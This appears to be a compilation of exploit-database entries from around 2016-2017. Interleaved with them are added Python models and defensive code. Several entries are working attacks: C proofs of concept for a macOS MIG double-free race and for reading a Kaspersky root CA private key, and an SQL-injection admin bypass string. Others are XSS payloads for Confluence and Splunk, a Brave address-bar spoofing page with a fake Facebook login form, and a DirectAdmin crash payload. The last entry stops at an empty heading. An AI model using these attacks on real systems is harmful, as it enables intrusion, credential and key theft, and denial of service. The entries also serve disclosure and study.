
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954

Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40954.zip

Userspace MIG services often use mach_msg_server or mach_msg_server_once to implement an RPC server.

These two functions are also responsible for managing the resources associated with each message
similar to the ipc_kobject_server routine in the kernel.

If a MIG handler method returns an error code then it is assumed not to have taken ownership of any
of the resources in the message, and both mach_msg_server and mach_msg_server_once will pass the message
to mach_msg_destroy:

If the message had an OOL memory descriptor it reaches this code:


  case MACH_MSG_OOL_DESCRIPTOR : {
    mach_msg_ool_descriptor_t *dsc;

    dsc = &saddr->out_of_line;
    if (dsc->deallocate) {
        mach_msg_destroy_memory((vm_offset_t)dsc->address,
        dsc->size);
    }
    break;
  }

...

  static void
  mach_msg_destroy_memory(vm_offset_t addr, vm_size_t size)
  {
      if (size != 0)
          (void) vm_deallocate(mach_task_self(), addr, size);
  }

If the deallocate flag is set in the ool descriptor then this will pass the address contained in the descriptor
to vm_deallocate.

By default MIG client code passes OOL memory with the copy type set to MACH_MSG_PHYSICAL_COPY, which results in the
receiver getting a 0 value for deallocate (meaning that you *do* need to vm_deallocate it in the handler even if you return
an error). But by setting the copy type to MACH_MSG_VIRTUAL_COPY in the sender, deallocate will be 1 in the receiver, meaning
that in cases where the MIG handler vm_deallocate's the OOL memory and returns an error code, the mach_msg_* code will
deallocate it again.

Exploitability hinges on being able to get the memory reallocated in between the two vm_deallocate calls, probably in another thread.

This PoC only demonstrates that an instance of the bug does exist in the first service I looked at,
com.apple.system.DirectoryService.legacy hosted by /usr/libexec/dspluginhelperd. Trace through in a debugger and you'll see the
two calls to vm_deallocate, first in _receive_session_create which returns an error code via the MIG reply message then in
mach_msg_destroy.

Note that this service has multiple threads interacting with mach messages in parallel.

I will have a play with some other services and try to exploit an instance of this bug class but the severity should
be clear from this PoC alone.

Tested on MacOS Sierra 10.12 16A323

##############################################################################

crash PoC

dspluginhelperd actually uses a global dispatch queue to receive and process mach messages,
these are by default parallel which makes triggering this bug to demonstrate memory corruption
quite easy, just talk to the service on two threads in parallel.

Note again that this isn't a report about this particular bug in this service but about the
MIG ecosystem - the various hand-written equivalents of mach_msg_server* / dispatch_mig_server
e.g. in notifyd and lots of other services all have the same issue.

*/

// ianbeer
// build: clang -o dsplug_parallel dsplug_parallel.c -lpthread


#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // memset

#include <servers/bootstrap.h>
#include <mach/mach.h>

char* service_name = "com.apple.system.DirectoryService.legacy";

mach_msg_header_t* msg;

struct dsmsg {
  mach_msg_header_t hdr;                // +0 (0x18)
  mach_msg_body_t body;                 // +0x18 (0x4)
  mach_msg_port_descriptor_t ool_port;  // +0x1c (0xc)
  mach_msg_ool_descriptor_t ool_data;   // +0x28 (0x10)
  uint8_t payload[0x8];                 // +0x38 (0x8)
  uint32_t ool_size;                    // +0x40 (0x4)
};                                      // +0x44

mach_port_t service_port = MACH_PORT_NULL;

void* do_thread(void* arg) {
  struct dsmsg* msg = (struct dsmsg*)arg;
  for(;;){
    kern_return_t err;
    err = mach_msg(&msg->hdr,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   (mach_msg_size_t)sizeof(struct dsmsg),
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL); 
    printf("%s\n", mach_error_string(err));
  }
  return NULL;
}

int main() {
  mach_port_t bs;
  task_get_bootstrap_port(mach_task_self(), &bs);

  kern_return_t err = bootstrap_look_up(bs, service_name, &service_port);
  if(err != KERN_SUCCESS){
    printf("unable to look up %s\n", service_name);
    return 1;
  }
  
  if (service_port == MACH_PORT_NULL) {
    printf("bad service port\n");
    return 1;
  }

  printf("got port\n");
  
  void* ool = malloc(0x100000);
  memset(ool, 'A', 0x1000);

  struct dsmsg msg = {0};

  msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
  msg.hdr.msgh_remote_port = service_port;
  msg.hdr.msgh_local_port = MACH_PORT_NULL;
  msg.hdr.msgh_id = 0x2328; // session_create

  msg.body.msgh_descriptor_count = 2;
  
  msg.ool_port.name = MACH_PORT_NULL;
  msg.ool_port.disposition = 20;
  msg.ool_port.type = MACH_MSG_PORT_DESCRIPTOR;

  msg.ool_data.address = ool;
  msg.ool_data.size = 0x1000;
  msg.ool_data.deallocate = 0; //1;
  msg.ool_data.copy = MACH_MSG_VIRTUAL_COPY;//MACH_MSG_PHYSICAL_COPY;
  msg.ool_data.type = MACH_MSG_OOL_DESCRIPTOR;

  msg.ool_size = 0x1000;

  pthread_t threads[2] = {0};
  pthread_create(&threads[0], NULL, do_thread, (void*)&msg);
  pthread_create(&threads[1], NULL, do_thread, (void*)&msg);

  pthread_join(threads[0], NULL);
  pthread_join(threads[1], NULL);


  return 0;
}
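The ownership rule from the write-up above, as an added Python model (not Project Zero's or Apple's code): the Mach VM is replaced by bookkeeping so that the second vm_deallocate shows up as a counter instead of a crash. The copy-type constant values are those of `<mach/message.h>`; the handler names, the address and the KERN_FAILURE return are assumptions for the model.

```python
from dataclasses import dataclass, field

# Constants as in <mach/message.h>; everything below is a portable model.
MACH_MSG_PHYSICAL_COPY = 0
MACH_MSG_VIRTUAL_COPY = 1
KERN_SUCCESS = 0
KERN_FAILURE = 5


@dataclass
class OolDescriptor:
    """Receiver-side view of mach_msg_ool_descriptor_t."""
    address: int
    size: int
    deallocate: bool


@dataclass
class VmModel:
    """Stand-in for the receiver task's address space plus bookkeeping."""
    mapped: set = field(default_factory=set)
    deallocate_calls: int = 0
    double_deallocates: int = 0

    def receive(self, copy_type: int, size: int) -> OolDescriptor:
        # The kernel maps the OOL region into the receiver. With VIRTUAL_COPY the
        # descriptor arrives with deallocate == 1, with PHYSICAL_COPY it is 0
        # (the behaviour the write-up describes).
        address = 0x10000  # constructed address for the model
        self.mapped.add(address)
        return OolDescriptor(address, size, copy_type == MACH_MSG_VIRTUAL_COPY)

    def vm_deallocate(self, address: int, size: int) -> None:
        self.deallocate_calls += 1
        if address in self.mapped:
            self.mapped.discard(address)
        else:
            # In the real task another thread may already have reused this range.
            self.double_deallocates += 1

    def mach_msg_destroy(self, dsc: OolDescriptor) -> None:
        """The MACH_MSG_OOL_DESCRIPTOR case quoted in the write-up."""
        if dsc.deallocate and dsc.size != 0:
            self.vm_deallocate(dsc.address, dsc.size)


def buggy_handler(vm: VmModel, dsc: OolDescriptor) -> int:
    """Frees the OOL region and then rejects the request: the pattern from the write-up."""
    vm.vm_deallocate(dsc.address, dsc.size)
    return KERN_FAILURE


def careful_handler(vm: VmModel, dsc: OolDescriptor, accept: bool = False) -> int:
    """Respects the ownership rule on both the error path and the success path."""
    if not accept:
        if not dsc.deallocate:
            # PHYSICAL_COPY: mach_msg_destroy will not touch it, so the handler must.
            vm.vm_deallocate(dsc.address, dsc.size)
        # VIRTUAL_COPY: ownership stays with mach_msg_server / mach_msg_destroy.
        return KERN_FAILURE
    # ... use dsc.address ...
    vm.vm_deallocate(dsc.address, dsc.size)  # success: the handler owns it, free once
    return KERN_SUCCESS


def serve_once(copy_type: int, handler) -> VmModel:
    """Model of mach_msg_server_once: destroy the message only when the handler fails."""
    vm = VmModel()
    dsc = vm.receive(copy_type, 0x1000)
    if handler(vm, dsc) != KERN_SUCCESS:
        vm.mach_msg_destroy(dsc)
    return vm


def leaked_regions(vm: VmModel) -> int:
    """Regions still mapped after the message was fully processed."""
    return len(vm.mapped)


if __name__ == "__main__":
    for name, h in (("buggy", buggy_handler), ("careful", careful_handler)):
        for copy_name, copy_type in (("PHYSICAL", MACH_MSG_PHYSICAL_COPY),
                                     ("VIRTUAL", MACH_MSG_VIRTUAL_COPY)):
            vm = serve_once(copy_type, h)
            print(f"{name:8s} {copy_name:8s} deallocate calls={vm.deallocate_calls} "
                  f"double={vm.double_deallocates} leaked={leaked_regions(vm)}")
```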
            
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigate to the script's admin login page and submit ' or ''=' for both username and password;
it should give you access to the admin area. Enjoy >:)
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=989

When Kaspersky generate a private key for the local root, they store the private key in %ProgramData%. Obviously this file cannot be shared, because it's the private key for a trusted local root certificate and users can use it to create certificates, sign files, create new roots, etc. If I look at the filesystem ACLs, I should have access, and was about to complain that they've done this incorrectly, but it doesn't work and it took me a while to figure out what they were doing.

$ icacls KLSSL_privkey.pem
KLSSL_privkey.pem BUILTIN\Administrators:(I)(F)
                  BUILTIN\Users:(I)(RX) <-- All users should have read access
                  NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files
$ cat KLSSL_privkey.pem
cat: KLSSL_privkey.pem: Permission denied

Single stepping through why this fails, I can see their filter driver will deny access from their PFLT_POST_OPERATION_CALLBACK after checking the Irpb. That sounds difficult to get right, and reverse engineering the filter driver, I can see they're setting Data->IoStatus.Status = STATUS_ACCESS_DENIED if the Irpb->Parameters (like DesiredAccess or whatever) don't match a hardcoded bitmask.

But the blacklist is insufficient, they even missed MAXIMUM_ALLOWED (?!!!). This is trivial to exploit, any unprivileged user can now become a CA.
*/

#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>

int main(int argc, char **argv)
{
    HANDLE File;
    BYTE buf[2048] = {0};
    DWORD count;

    File = CreateFile("c:\\ProgramData\\Kaspersky Lab\\AVP17.0.0\\Data\\Cert\\KLSSL_privkey.pem",
            MAXIMUM_ALLOWED,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
    if (File != INVALID_HANDLE_VALUE) {
        if (ReadFile(File, buf, sizeof(buf), &count, NULL) == TRUE) {
            setmode(1, O_BINARY);
            fwrite(buf, 1, count, stdout);
        }
        CloseHandle(File);
        return 0;
    }
    return 1;
}

/*
$ cl test.c
Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.

test.c
Microsoft (R) Incremental Linker Version 12.00.31101.0
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:test.exe
test.obj
$ ./test.exe | openssl rsa -inform DER -text -noout
Private-Key: (2048 bit)
modulus:
    00:b4:3f:57:21:e7:c3:45:e9:43:ec:b4:83:b4:81:
    bb:d3:3b:9b:1b:da:07:55:68:e0:b1:75:38:b9:66:
    0d:4c:e4:e7:f3:92:01:fb:33:bf:e6:34:e4:e8:db:
    f1:7c:53:bc:95:2c:2d:08:8d:7c:8c:03:71:cd:07:
*/
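An added model (Python, not Kaspersky's driver code) of the deny-list check described above beside an allow-list version of the same decision. The access-mask constants are the winnt.h values; the deny mask, the allow mask and the simplified rights_granted() are assumptions for the model.

```python
# Access-mask constants from winnt.h.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
MAXIMUM_ALLOWED = 0x02000000
FILE_READ_DATA = 0x0001
FILE_WRITE_DATA = 0x0002
FILE_APPEND_DATA = 0x0004
FILE_EXECUTE = 0x0020
FILE_READ_ATTRIBUTES = 0x0080
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
SYNCHRONIZE = 0x00100000

STATUS_SUCCESS = 0x00000000
STATUS_ACCESS_DENIED = 0xC0000022

# Assumed deny mask: the driver's real hardcoded bitmask is not on the page.
DENY_MASK = (GENERIC_READ | GENERIC_WRITE | GENERIC_EXECUTE | GENERIC_ALL
             | FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_EXECUTE
             | DELETE | WRITE_DAC)


def denylist_post_create(desired_access: int) -> int:
    """Deny-list check: 'is any forbidden bit set?'. MAXIMUM_ALLOWED sets none of
    them, yet the object manager then grants every right the ACL allows."""
    if desired_access & DENY_MASK:
        return STATUS_ACCESS_DENIED
    return STATUS_SUCCESS


# Rights a non-privileged caller may legitimately request on the key file (assumed).
ALLOWED_MASK = FILE_READ_ATTRIBUTES | READ_CONTROL | SYNCHRONIZE


def allowlist_post_create(desired_access: int) -> int:
    """Allow-list check: every requested bit must be explicitly permitted, so
    MAXIMUM_ALLOWED, ACCESS_SYSTEM_SECURITY or any future right is refused."""
    if desired_access & ~ALLOWED_MASK:
        return STATUS_ACCESS_DENIED
    return STATUS_SUCCESS


# BUILTIN\Users:(RX) from the icacls output above, expressed as specific rights (simplified).
USERS_RX = FILE_READ_DATA | FILE_EXECUTE | FILE_READ_ATTRIBUTES | READ_CONTROL | SYNCHRONIZE


def rights_granted(desired_access: int, acl_allows: int) -> int:
    """Simplified object-manager behaviour: MAXIMUM_ALLOWED becomes everything the
    ACL allows; otherwise the open succeeds only if every requested bit is allowed."""
    if desired_access & MAXIMUM_ALLOWED:
        return acl_allows
    return desired_access if not (desired_access & ~acl_allows) else 0


def can_read_key(filter_check, desired_access: int) -> bool:
    """True when the filter lets the open through and the handle can read file data."""
    if filter_check(desired_access) != STATUS_SUCCESS:
        return False
    return bool(rights_granted(desired_access, USERS_RX) & FILE_READ_DATA)


if __name__ == "__main__":
    for label, mask in (("FILE_READ_DATA", FILE_READ_DATA), ("MAXIMUM_ALLOWED", MAXIMUM_ALLOWED)):
        print(f"{label:16s} denylist -> readable={can_read_key(denylist_post_create, mask)} "
              f"allowlist -> readable={can_read_key(allowlist_post_create, mask)}")
```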
            
=====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]==============

  Persisted Cross-Site Scripting (XSS) in Confluence Jira Software
  ----------------------------------------------------------------

  Author(s):
        - Jodson Santos
        - jodson.santos@tempest.com.br

  Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[Table of Contents]=====================================================

1. Overview
2. Detailed description
3. Affected versions & Solutions
4. Timeline of disclosure
5. Thanks & Acknowledgements
6. References

=====[1. Overview]============================================================

 * System affected  : Atlassian Confluence
 * Software Version : 5.9.12
                      Other versions or models may also be affected.
 * Impact           : This vulnerability allows an attacker to use
                      Confluence's platform to deliver attacks against
                      other users.

=====[2. Detailed description]================================================

Atlassian Confluence version 5.9.12 is vulnerable to persistent cross-site
scripting (XSS) because it fails to securely validate user controlled data,
thus making it possible for an attacker to supply crafted input in order to
harm users. The bug occurs on pages carrying attached files: even though
the attached file name parameter is correctly sanitized upon submission, it is
possible for an attacker to later edit the attached file name property and
supply crafted data (i.e. HTML tags and script code) without any security
checks taking place, resulting in an exploitable persistent XSS.

In order to reproduce the vulnerability, go to a page with an attached
file, click on "Attachments" in order to list the page's attachments, and then
click on "Properties" for the file of your choice. Edit the file name to, for
example, <script>alert(1)</script>test.pdf and then save the changes.
Although the XSS is not executed within the page display, it is possible to
trigger the execution of the supplied code while performing a search within
Confluence whose results include the attachment with the crafted file name. For that
matter, the search terms " or * will promptly display the file and execute the
injected JavaScript code.

To illustrate this further, the following excerpt shows a POST request with
the malicious insertion in the newFileName field:

POST
/pages/doeditattachment.action?pageId={pageId}&attachmentBean.fileName=(unknown) HTTP/1.1
Host: {confluence host}
Cookie: mywork.tab.tasks=false; JSESSIONID={redacted};
confluence.browse.space.cookie=space-templates
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: {redacted}

atl_token={atl_token}&pageId={pageId}&isFromPageView=false&newFileName=<script>alert(1)</script>file&newComment=&newContentType=application%2Foctet-stream&newParentPage=&confirm=Save

It is worth noting that the issue may affect users regardless of privilege
levels, since the malicious page/attachment can be browsed by any user
within the Atlassian Confluence instance.

=====[3. Affected versions & Solutions]=======================================

This test was performed against Atlassian Confluence version 5.9.12.

According to vendor's response, the vulnerability is addressed and the
fix is part of the 5.10.6 release.

=====[4. Timeline of disclosure]==============================================

Jul/07/2016 - Vendor acknowledged the vulnerability.
Aug/04/2016 - Vendor released the fix for the vulnerability in version 5.10.6.

=====[5. Thanks & Acknowledgements]===========================================

  - Tempest Security Intelligence / Tempest's Pentest Team [1]
  - Joaquim Brasil
  - Heyder Andrade
  - Breno Cunha

=====[6. References]==========================================================

[1] https://en.wikipedia.org/wiki/Confluence_(software)
            
Source: https://github.com/theori-io/chakra-2016-11

Proofs of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40990.zip


chakra.dll Info Leak + Type Confusion for RCE

Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)

Tested on Windows 10 Edge (modern.ie stable).

FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe

FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)

To run:

Download exploit/FillFromPrototypes_TypeConfusion.html to a directory.
Serve the directory using a webserver (or python's simple HTTP server).
Browse with a victim IE to FillFromPrototypes_TypeConfusion.html.
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=963

The MAX86902 sensor has a driver that exposes several interfaces through which the device may be configured. In addition to exposing a character device, it also exposes several entries under sysfs.

Some of these entries are writable, allowing different values to be configured. Three such files are exposed under the paths:

/sys/devices/virtual/sensors/hrm_sensor/eol_test_result 
/sys/devices/virtual/sensors/hrm_sensor/lib_ver
/sys/devices/virtual/sensors/uv_sensor/uv_lib_ver

The sysfs write handlers for these files all share approximately the same logic. Below is one such handler, for the "uv_lib_ver" sysfs entry:

1.  static ssize_t max86900_uv_lib_ver_store(struct device *dev,
2.  	struct device_attribute *attr, const char *buf, size_t size)
3.  {
4.  	struct max86900_device_data *data = dev_get_drvdata(dev);
5.  	unsigned int buf_len;
6.  	buf_len = (unsigned int)strlen(buf) + 1;
7.  	if (buf_len > MAX_LIB_VER)
8.  		buf_len = MAX_LIB_VER;
9.  
10. 	if (data->uv_lib_ver != NULL)
11.		kfree(data->uv_lib_ver);
12.
13.	data->uv_lib_ver = kzalloc(sizeof(char) * buf_len, GFP_KERNEL);
14.	if (data->uv_lib_ver == NULL) {
15.		pr_err("%s - couldn't allocate memory\n", __func__);
16.		return -ENOMEM;
17.	}
18.	strncpy(data->uv_lib_ver, buf, buf_len);
19.	pr_info("%s - uv_lib_ver = %s\n", __func__, data->uv_lib_ver);
20.	return size;
21. }

Since the code above does not use any mechanism to prevent concurrent access, it contains race conditions which allow corruption of kernel memory.

For example, one such race condition could occur when two attempts to call "write" are executed at the same time, where the underlying buffers have different lengths. More concretely, denote the two accessing tasks "task1" and "task2", correspondingly. Consider the following sequence of events:

  -"task1" attempts to write to the entry, and provides a buffer of length 20. 
  -"task1" manages to execute lines 1-17 (inclusive)
  -"task2" now attempts to write to the entry, and provides a buffer of length 2.
  -"task2" manages to execute lines 1-13 (inclusive)
  -"task1" now executes line 18, resulting in an overflow when writing to data->uv_lib_ver (since its actual length is now 2)

This issue can be addressed by adequate locking when accessing the sysfs entries.

I've statically and dynamically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource", the device's build is "XXS1APG3".

The sysfs entries mentioned above have UID "system" and GID "radio". The SELinux context for these entries is: "u:object_r:sysfs_sensor_writable:s0".

According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:

 allow radio sysfs_sensor_writable : file { ioctl read write getattr lock append open } ; 
 allow factory_adsp sysfs_sensor_writable : file { ioctl read write getattr lock append open } ; 
 allow sensorhubservice sysfs_sensor_writable : file { write append open } ; 
 allow sysfs_sensor_writable sysfs_sensor_writable : filesystem associate ; 
 allow system_app sysfs_sensor_writable : file { ioctl read write getattr lock append open } ; 


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40993.zip
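The interleaving from the write-up above, replayed as an added Python model (not Samsung's driver code): the store handler is a generator whose yields are the points where the other writer may run, the kernel heap is replaced by a size map that counts out-of-bounds writes, and `locked=True` adds the mutex the write-up recommends. The value of MAX_LIB_VER and the handle numbers are assumptions.

```python
import threading

MAX_LIB_VER = 20  # assumed value; the driver's constant is not on the page


class KernelHeap:
    """Tiny kzalloc/kfree/strncpy model that records bounds violations instead of corrupting memory."""

    def __init__(self) -> None:
        self.live = {}            # handle -> allocation size
        self.next_handle = 0x1000
        self.overflows = 0

    def kzalloc(self, size: int) -> int:
        handle = self.next_handle
        self.next_handle += 0x100
        self.live[handle] = size
        return handle

    def kfree(self, handle: int) -> None:
        del self.live[handle]

    def strncpy(self, handle: int, buf: str, n: int) -> None:
        if n > self.live[handle]:
            self.overflows += 1   # n bytes written into a smaller allocation


class Device:
    """The relevant part of struct max86900_device_data, plus the missing lock."""

    def __init__(self) -> None:
        self.uv_lib_ver = None
        self.lock = threading.Lock()


def uv_lib_ver_store(dev: Device, heap: KernelHeap, buf: str, locked: bool):
    """max86900_uv_lib_ver_store as a generator; each yield is a point where the
    scheduler may run the other writer. locked=True holds a mutex for the whole body."""
    if locked:
        while not dev.lock.acquire(blocking=False):
            yield "blocked"
    buf_len = min(len(buf) + 1, MAX_LIB_VER)           # lines 6-8
    if dev.uv_lib_ver is not None:                      # lines 10-11
        heap.kfree(dev.uv_lib_ver)
    dev.uv_lib_ver = heap.kzalloc(buf_len)              # line 13
    yield "allocated"                                   # lines 1-17 done, line 18 pending
    heap.strncpy(dev.uv_lib_ver, buf, buf_len)          # line 18: stale buf_len if preempted
    if locked:
        dev.lock.release()


def run_interleaving(writes, order, locked: bool) -> int:
    """Step the writers in the given order of task indices; return the overflow count."""
    dev, heap = Device(), KernelHeap()
    tasks = [uv_lib_ver_store(dev, heap, w, locked) for w in writes]
    for i in order:
        try:
            next(tasks[i])
        except StopIteration:
            pass
    return heap.overflows


# The exact sequence from the write-up: task1 (20 bytes) runs to line 17,
# task2 (2 bytes) runs to line 13, then task1 executes line 18.
RACE_WRITES = ("A" * 19, "B")
RACE_ORDER = (0, 1, 0, 1)


def overflows_without_lock() -> int:
    return run_interleaving(RACE_WRITES, RACE_ORDER, locked=False)


def overflows_with_lock() -> int:
    # task2 is blocked on the mutex at step 2; the extra steps let it finish afterwards.
    return run_interleaving(RACE_WRITES, RACE_ORDER + (1, 1), locked=True)


if __name__ == "__main__":
    print("overflows without lock:", overflows_without_lock())
    print("overflows with lock:   ", overflows_with_lock())
```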
            
Brave Browser suffers from an address bar spoofing vulnerability. Address bar
spoofing is a critical vulnerability in which an attacker can make the address
bar show a legitimate-looking website while the content of the web page
differs from what the address bar displays. In simple words, the victim sees a
familiar-looking URL, but the content is not from that URL; it is attacker
controlled content. Some companies say "We recognize that the address bar is
the only reliable security indicator in modern browsers".
Products affected:

   - In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
   - In Android - Affected in Brave Latest version 1.9.56


Exploit Code: 

<html>
<title>Address Bar spoofing Brave</title>
<h1> This is Dummy Facebook </h1>
<form>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
<script>
function f()
{
location = "https://facebook.com"
}
setInterval("f()", 10);
</script>
</html>
            
Exploit Title : Advanced Desktop Locker [ Locker Bypass ]
# Date: 8 - 1 - 2017
# Software Link: http://www.encrypt4all.com/products/advanced-desktop-locker-information.php
# Software Version : 6.0.0
# Exploit Author: Squnity | Sir.matrix
# Contact: secfathy@squnity.com
# Website: https://www.squnity.com
# Category: windows

1. Description

This application is developed to lock desktop control while the user downloads files
or at any other time.
I can kill its task to bypass this application.


2. Proof of Concept

- Lock Your Desktop With ADL
- Click on Ctrl + R [ Run Shortcut ]
- Write CMD & Write taskmgr
- When Task Manager opens, select the ADL process and click Delete to kill it
- Exploited


POC Video :


https://www.youtube.com/watch?v=UXjHwzz2sEo&feature=youtu.be
            
#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# Directadmin ControlPanel 1.50.1 denial of service Vulnerability

# Directadmin Version : 1.50.1 And Old Version

# Tested On : Centos 6 - Directadmin 1.50.1

# Vendor site : http://www.directadmin.com

# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)

# Site : Www.IeDb.Ir  -  irist.ir   -   xssed.Ir

# Iedb Telegram : https://telegram.me/iedbteam

# Archive Exploit = http://www.iedb.ir/exploits-6517.html

#####################################

Description :

An attacker can send an overly long username and password to the DirectAdmin login screen, which disrupts DirectAdmin and crashes it.
This problem is present in all versions of DirectAdmin.
There is no limit on the number of characters entered.
An attacker could write a script to perform a DDoS attack based on the following information:

http://Ip:2222/CMD_LOGIN

POST /CMD_LOGIN HTTP/1.1

referer=%2F&username=$POC&password=$POC

$POC = A * 10000

#####################################

** http://iedb.ir  ==>> Iranian Exploit DataBase And Iranian Security Team

** http://irist.ir  ==>> Register hacked sites

** http://xssed.Ir  ==>>  Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)

Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,Ramin Asadyan,

Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team

#####################################

#  Archive Exploit = http://www.iedb.ir/exploits-6517.html

#####################################
            
# Exploit Title: Splunk 'Referer' Header Cross Site Scripting Vulnerability
# Date: 7th January 2017
# Exploit Author: justpentest
# Vendor Homepage: http://www.splunk.com/
# Version: Splunk 6.1.1 other versions may also be affected.
# Contact: transform2secure@gmail.com


Source: https://www.securityfocus.com/bid/67655/info
 
1) Description:
Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
2) Exploit:
 
URL: http://justpentest.com:8000/en-US/app/
 
GET /en-US/app/ HTTP/1.1
Host=justpentest.com:8000
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=javascript:prompt("XXS by justpentest");
Connection=keep-alive
----------------------------------------------------------------------------------------
Response:
 <p>This page was linked to from <a href="javascript:prompt("XXS by justpentest");">javascript:prompt("XXS by justpentest");</a>.</p>
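Added defensive code (Python, not Atlassian's or Splunk's) covering both the Confluence attachment-name XSS above and the Splunk Referer XSS here: the attachment name is validated at rename time and output-encoded wherever it is displayed, and the Referer is only placed in an href after its scheme has been checked. The function names and the rejected-character set are assumptions.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}


def safe_href(url: str) -> Optional[str]:
    """Attribute-safe href for http(s) URLs only; None for javascript:, data:, relative, etc."""
    # Browsers ignore tabs and newlines inside a scheme, so drop them before parsing.
    cleaned = "".join(ch for ch in url if ch not in "\t\n\r").strip()
    if urlsplit(cleaned).scheme.lower() not in SAFE_SCHEMES:
        return None
    return html.escape(cleaned, quote=True)


def render_referer_notice(referer: str) -> str:
    """Safe form of Splunk's 'This page was linked to from ...' paragraph."""
    href = safe_href(referer)
    if href is None:
        return "<p>This page was linked to from an unrecognised location.</p>"
    return f'<p>This page was linked to from <a href="{href}">{html.escape(referer)}</a>.</p>'


# Characters refused in an attachment name at rename time (assumed policy).
FORBIDDEN_NAME_CHARS = set('<>"\'/\\')


def is_valid_attachment_name(name: str) -> bool:
    """The check that Confluence's rename path lacked: reject markup and control characters."""
    if not name or len(name) > 255:
        return False
    return not any(ch in FORBIDDEN_NAME_CHARS or ord(ch) < 0x20 for ch in name)


def render_attachment_name(file_name: str) -> str:
    """Output-encode the name everywhere it is displayed, search results included,
    so a value that slipped past validation is still shown as text."""
    return html.escape(file_name, quote=True)


if __name__ == "__main__":
    print(render_referer_notice('javascript:prompt("XXS by justpentest");'))
    print(render_referer_notice("https://example.com/?a=1&b=2"))
    print(render_attachment_name("<script>alert(1)</script>test.pdf"))
```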
            
# # # # # 
# Vulnerability: My Php Dating 2.0 - SQL Injection Web Vulnerability
# Google Dork: My Php Dating
# Date:09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Script Name: My Php Dating
# Script Version: 2.0
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
